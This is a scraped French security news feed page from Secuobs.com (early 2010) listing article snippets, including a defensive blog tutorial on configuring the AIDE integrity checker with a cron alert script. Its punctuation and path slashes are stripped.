éditeur a publié un bulletin pour révéler l existence d un logiciel se faisant passer pour Microsoft Security Essentials, son utilitaire gratuit de sécurité Cette copie installe un cheval de Troie qui désactive les protections du PC et un autre qui vole les données Lire l'article http://www.secuobs.com/revue/news/196545.shtmlhttp://www.secuobs.com/revue/news/196545.shtml Secuobs.com : 2010-03-01 12:14:10 - L'Atelier.fr Toute l'actualité - Les bénéfices des applications géolocalisées sont importants, souligne une équipe de Berkeley A condition qu'elles respectent plusieurs critères comme le choix pour l'internaute des informations transmises IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/196542.shtmlhttp://www.secuobs.com/revue/news/196542.shtml Secuobs.com : 2010-03-01 11:23:17 - Global Security Mag Online - ftopia, fournisseur d'espaces sécurisés de partage de fichiers en mode SaaS Software as a Service pour les professionnels annonce que la société a rejoint le programme BizSpark de Microsoft BizSpark est un programme mondial destiné à soutenir et accélérer le développement des startups En réelle correspondance avec les attentes des jeunes sociétés, BizSpark fournit l'accès au software et au support technologique de Microsoft tout en permettant une plus grande visibilité aux entreprises - Business http://www.secuobs.com/revue/news/196526.shtmlhttp://www.secuobs.com/revue/news/196526.shtml Secuobs.com : 2010-03-01 10:19:18 - Global Security Mag Online - Les centres de données actuels ne sont plus les centres de stockage de données gros consommateurs d'énergie d'antan À l'époque où peu d'entreprises couraient après les parts du marché en ligne, les centres de données pouvaient se permettre de fournir, à leur aise, de très bons services en consommant peu d'énergie De nos jours, de plus en plus d'individus, de sociétés et d'organismes entrent sur le marché en ligne Par conséquent, les centres de données se voient contraints de consommer une énorme quantité - Points de Vue http://www.secuobs.com/revue/news/196517.shtmlhttp://www.secuobs.com/revue/news/196517.shtml Secuobs.com : 2010-03-01 10:19:18 - Global Security Mag Online - La proposition de Loi déposée le 6 novembre 2009 par les Sénateurs Yves Détraigne et Anne-Marie Escoffier va passer en première lecture le 23 mars 2010 Ce texte, qui modifierait la loi relative à l'informatique, aux fichiers et aux libertés propose de rendre obligatoire le Correspondant Informatique et Libertés le CIL , prône le renforcement des sanctions de la Cnil et envisage la publication des failles de sécurité - ce qui correspond plus exactement à la notification des Data Breach - Points de Vue affiche_gauche http://www.secuobs.com/revue/news/196516.shtmlhttp://www.secuobs.com/revue/news/196516.shtml Secuobs.com : 2010-02-28 23:14:53 - cloud's Blog - Un jour ou l'autre, vous vous ferez pirater C'est comme ça, les 0days sont publiés et la diffusion des patchs et leur application n'étant pas immédiates, on reste forcément vulnérable pendant une période De la meme manière, les technos évoluent et des problèmes peuvent survenir à tout moment C'est une fatalité L'objectif est donc de réagir au plus vite, de détecter ces intrusions, et de les éradiquer aussitot Un des outils permettant de controler l'intégrité de ses serveurs est le Tripwire Cet outil va créer une base de données de fichiers à surveiller en enregistrant les informations du fichier comme l'uid, gid, nom, heure de création, modification, le hash du fichier, sa taille bref toutes les informations permettant d'identifier un fichier Ensuite il vérifiera régulièrement l'état de ce fichier et s'il constate des différences, nous enverrons une alerte par mail Nous travaillerons ici avec AIDE sur un système FreeBSD Les répertoires peuvent changer si vous utilisez Linux cloud r00t psearch aide security aide A replacement and extension for Tripwire En règle général, Tripwire est configuré par défaut pour controler tous les fichiers systèmes et de configuration de base du système Personnellement je délègue cette tache à mon analyseur de rootkit rkhunter ou chkrootkitIci nous allons configurer AIDE afin qu'il analyse notre répertoire web en ajoutant une exception sur un répertoire d'upload qui varie donc fréquemment Le fichier de configuration va donc ressembler à ca cloud r00t cat usr local etc aideconf usr local www apache22 R usr local www apache22 upload R R est un template de droits existants Les différents templates sont Templates default R R ead-only p i n u g s m md5 tiger rmd160 sha1-a L L og file p i n u g-s-a-m-md5-tiger-rmd160-sha1 N ignore N othing p i n u s g s a m c md5 tiger rmd160 sha1 E ignore E verything -p-i-n-u-s-g-s-a-m-c-md5-tiger-rmd160-sha1 p permission and file mode bits a access timestamp i inode number m modification timestamp n number of links ref count c inode creation timestamp u user id of owner md5 MD5 signature g group id of owner tiger tiger signature s size of file rmd160 RMD160 signature sha1 SHA1 signature Rien de bien compliqué On indique les répertoires dont l'on souhaite surveiller l'intégrité et les droit associés avec ou - Une fois cela terminé, nous allons créer la base de donnée avec la commande suivante cloud r00t sudo aide -i AIDE, version 0131 AIDE database at var db aide databases aidedbnew initialized Nous avons donc un fichier aidedbnew que nous allons copier et qui servira de référence cloud r00t sudo cp var db aide databases aidedbnew var db aide databases aidedb Le base de donnée ressemble à ceci cloud r00t sudo cat var db aide databases aidedb begin_db This file was generated by Aide, version 0131 Time of generation was 2010-02-28 21 05 20 db_spec name lname attr perm uid gid inode lcount size mtime ctime md5 usr local www apache22 0 3005 40755 0 0 378392 6 512 MTI2MjYyNzc5Mg MTI2MjYyNzc5Mg 0 usr local www apache22 data 0 3005 40755 0 0 378393 2 512 MTI2MjYyNzc5Mg MTI2MjYyNzc5Mg 0 usr local www apache22 error 0 3005 40755 0 0 378396 3 1024 MTI2MjYyNzc5Mg MTI2MjYyNzc5Mg 0 usr local www apache22 icons 0 3005 40755 0 0 378420 3 3584 MTI2MjYyNzc5Mg MTI2MjYyNzc5Mg 0 Maintenant que notre base est créée, l'objectif va etre de controler régulièrement si des modifications ont été apportées sur ces répertoires avec l'option -C check Si aucune modification n'apparait, le résultat sera le suivant cloud r00t sudo aide -C AIDE, version 0131 All files match AIDE database Looks okay Si des modifications ont été faites, on observera alors la chose suivante cloud r00t sudo touch usr local www apache22 test cloud r00t sudo aide -C AIDE found differences between database and filesystem Start timestamp 2010-02-28 21 15 19 Summary Total number of files 258 Added files 1 Removed files 0 Changed files 1 --------------------------------------------------- Added files --------------------------------------------------- added usr local www apache22 test --------------------------------------------------- Changed files --------------------------------------------------- changed usr local www apache22 -------------------------------------------------- Detailed information about changes --------------------------------------------------- Directory usr local www apache22 Mtime 2010-01-04 18 56 32 , 2010-02-28 21 15 16 Ctime 2010-01-04 18 56 32 , 2010-02-28 21 15 16 Le Tripwire a donc bien détecté l'ajout du fichier ainsi que la date de modification du répertoire apache22 Automatisons maintenant la recherche via un petit script que nous exécuterons toutes les 5 minutes via un cron Le principe du script va etre le suivant nous allons faire un check avec AIDE et stocker le résultat dans un fichier Si tout est OK, nous ne faisons rien Si AIDE voit une modification, il envoi un mail à l'admin avec le rapport pour le prévenir puis recrée une base afin d'éviter que l'admin ne se fasse spamer Voici le script Bash usr local bin bash mail_admin admin sitecom file_res root aiderestxt aide -C file_res res cat file_res grep All files match AIDE database Looks okay if res then mail -s Integrity Alert Tripwire mail_admin file_res aide -i cp var db aide databases aidedbnew var db aide databases aidedb fi rm file_res On rend notre script exécutable et on crée notre cron cloud r00t root sudo chmod x aide_alertsh cloud r00t root sudo crontab -e 5 root aide_alertsh Voilà nous avons maintenant un système de controle d'intégrité avec remontées d'alertes pour notre répertoire web http://www.secuobs.com/revue/news/196441.shtmlhttp://www.secuobs.com/revue/news/196441.shtml Secuobs.com : 2010-02-28 21:30:34 - Random Radio - NEWS Google vs China, fibre optique, nanotechs, Microsoft Law Enforcement leaking, Jabber, DNS sec SUJETS la culture hacker dans les medias, networken AGENDA http://www.secuobs.com/revue/news/196407.shtmlhttp://www.secuobs.com/revue/news/196407.shtml Secuobs.com : 2010-02-28 17:34:04 - cloud's Blog - Un petit post pour vous informer que vous pouvez retrouver 2 articles écrits par moi meme dans le nouveau numéro de Hakin9 Au menu, 2 sujets que vous avez pu déjà voir ici que j'ai développé, à savoir Les premiers virus iPhone sont là Cet article développe la vulnérabilité des iPhone jailbreakés déjà développée ici avec des détails sur les contres mesures et comment exploiter la vulnérabilité pour créer un botnet ou voler de l'argent FreeBSD local r00t exploit Cet article reprend en détail l'explication du 0day de Kingcope et une explication de LD_PRELOAD En espérant que j'ai été clair dans mes explications et que cela vous intéresse http://www.secuobs.com/revue/news/196388.shtmlhttp://www.secuobs.com/revue/news/196388.shtml Secuobs.com : 2010-02-28 15:59:58 - Criminalités numériques - suite à mon billet précédent sur l obligation de notification d incidents de sécurité Le texte issu de la commission des lois La proposition de loi Détraigne Escoffier aborde aussi le statut de l adresse IP dans les traitements de données et propose un article 2 finalement assez simple Le deuxième alinéa de l article 2 de la loi n 78-17 du http://www.secuobs.com/revue/news/196373.shtmlhttp://www.secuobs.com/revue/news/196373.shtml Secuobs.com : 2010-02-28 01:59:56 - Criminalités numériques - Retour sur le Paquet télécoms J évoquais voilà un an la volonté émise par l Union européenne de rendre obligatoire la notification des incidents de sécurité dont sont victimes les opérateurs de communications électroniques, lorsqu ils ont un impact sur des données personnelles Cette disposition a été adoptée lors du vote final du Paquet télécoms au mois de novembre http://www.secuobs.com/revue/news/196320.shtmlhttp://www.secuobs.com/revue/news/196320.shtml Secuobs.com : 2010-02-27 16:30:51 - Criminalités numériques - Je vous propose quelques informations sur des conférences en rapport avec la cybercriminalité au cours des semaines à venir en France 16 mars 2010, JSSI Journée sécurité des systèmes d information 2010, OSSIR, programme 23 au 25 mars 2010, Conférence Octopus 2010, Conseil de l Europe Strasbourg , programme 31 mars et 01 avril 2010, FIC 4ème Forum international sur http://www.secuobs.com/revue/news/196280.shtmlhttp://www.secuobs.com/revue/news/196280.shtml Secuobs.com : 2010-02-26 20:18:58 - Les derniers documents du CERTA. - CERTA-2010-ACT-008 http://www.secuobs.com/revue/news/196002.shtmlhttp://www.secuobs.com/revue/news/196002.shtml Secuobs.com : 2010-02-26 19:07:40 - Global Security Mag Online - VMware, Inc rachète certains logiciels et compétences à l'entité Ionix IT Management Business d'EMC Cette transaction - réalisée exclusivement en numéraire et portant sur un montant jusqu'à 200 millions de dollars devrait être définitivement conclue au deuxième trimestre 2010 et ne pas avoir d'impact matériel sur les prévisions antérieures d'EMC et de VMware pour 2010 Selon les termes de cet accord, VMware rachètera toutes les technologies et propriétés intellectuelles de FastScale Application - Business http://www.secuobs.com/revue/news/195981.shtmlhttp://www.secuobs.com/revue/news/195981.shtml Secuobs.com : 2010-02-26 18:36:20 - L'Atelier.fr Toute l'actualité - L'utilisation de capteurs organisés affectera positivement plusieurs secteurs, mais à condition de surmonter l'obstacle de la consommation énergétique L'utilisation de régulateurs de communication s'annonce comme une solution IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/195977.shtmlhttp://www.secuobs.com/revue/news/195977.shtml Secuobs.com : 2010-02-26 17:53:01 - Global Security Mag Online - Chacun d'entre nous a un volume de données qui croît de manière exponentielle au fil des jours Photos, vidéos, musique, données professionnelles Les sauvegarder, les protéger, les stocker et les partager dans un même espace sécurisé, illimité et accessible n'importe où et à tout moment est désormais possible grâce à YuuWaa Si le monde professionnel est globalement informé et conscient de la nécessité de sauvegarder ses données, il n'en va pas de même pour le grand public De plus, certains utilisateurs - Produits http://www.secuobs.com/revue/news/195963.shtmlhttp://www.secuobs.com/revue/news/195963.shtml Secuobs.com : 2010-02-26 17:29:29 - L'Atelier.fr Toute l'actualité - Le marché des services mobiles localisés est en pleine croissance Il sera porté par les commerçants, qui y voient la possibilité de générer de l'information et des coupons de réduction quand le consommateur en a besoin IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/195962.shtmlhttp://www.secuobs.com/revue/news/195962.shtml Secuobs.com : 2010-02-26 16:48:16 - Global Security Mag Online - MARKESS International, société d'études et de conseil basée à Paris et à Washington, DC, spécialisée dans l'analyse de la modernisation et de la transformation des organisations privées et publiques avec les technologies de l'information, annonce la parution de sa nouvelle étude intitulée Sauvegarde de Données Usages Perspectives Conscientes des risques associés à la défaillance de leurs infrastructures et applications, soucieuses de minimiser les risques d'interruption de service et leur - Investigations http://www.secuobs.com/revue/news/195946.shtmlhttp://www.secuobs.com/revue/news/195946.shtml Secuobs.com : 2010-02-26 16:48:16 - Global Security Mag Online - Le Tribunal de Bobigny 18ème chambre correctionnelle a condamné, le 22 février dernier, un trafiquant de contrefaçon de logiciels à une peine de 12 mois d'emprisonnement, dont 6 mois de prison ferme, pour importation de marchandises prohibées, contrefaçon de logiciels droit d'auteur et contrefaçon de marques Le Tribunal de Bobigny a condamné le mardi 22 février un trafiquant contrôlé par les douanes en patrouille à l'aéroport Roissy Charles-de-Gaulle alors qu'il arrivait de Hong Kong pour livrer - Vulnérabilités http://www.secuobs.com/revue/news/195945.shtmlhttp://www.secuobs.com/revue/news/195945.shtml Secuobs.com : 2010-02-26 15:20:17 - L'Atelier.fr Toute l'actualité - Les services de type M-Pesa ont des conséquences bénéfiques sur la vie de leurs utilisateurs Mais qu'en est-il sur l'économie du pays L'influence sur l'épargne ou l'emprunt semble encourageante mais reste à démontrer IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/195933.shtmlhttp://www.secuobs.com/revue/news/195933.shtml Secuobs.com : 2010-02-26 14:11:21 - L'Atelier.fr Toute l'actualité - Pour recréer dans les airs une projection en 3D, FlyFire a mis au point des hélicoptères qui embarquent des diodes LED Chacune correspond à un pixel de l'image Un système destiné aux secteurs artistique et publicitaire IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/195917.shtmlhttp://www.secuobs.com/revue/news/195917.shtml Secuobs.com : 2010-02-26 12:40:13 - Comme dans du beurre - Si vous avez eu des problèmes résultant de la publication de contenus images, textes, vidéos ayant porté atteinte à votre tranquillité, image, réputation, relations, profession, etc Si vous avez déjà fait appel à un spécialiste pour vous accompagner dans le nettoyage en ligne des données vous concernant http://www.secuobs.com/revue/news/195893.shtmlhttp://www.secuobs.com/revue/news/195893.shtml Secuobs.com : 2010-02-26 12:07:22 - L'Atelier.fr Toute l'actualité - Outre-rhin, identité réelle et identité numérique se certifient en utilisant une seule et même carte Les sites concernés ne pourront accéder qu'aux informations qu'ils sont autorisés à consulter IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/195889.shtmlhttp://www.secuobs.com/revue/news/195889.shtml Secuobs.com : 2010-02-26 12:07:22 - L'Atelier.fr Toute l'actualité - Le jeu entre en force dans les applications et les services digitaux Il permet enfin de parler d'expérience utilisateur, et libère une dynamique de création sans précédent IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/195888.shtmlhttp://www.secuobs.com/revue/news/195888.shtml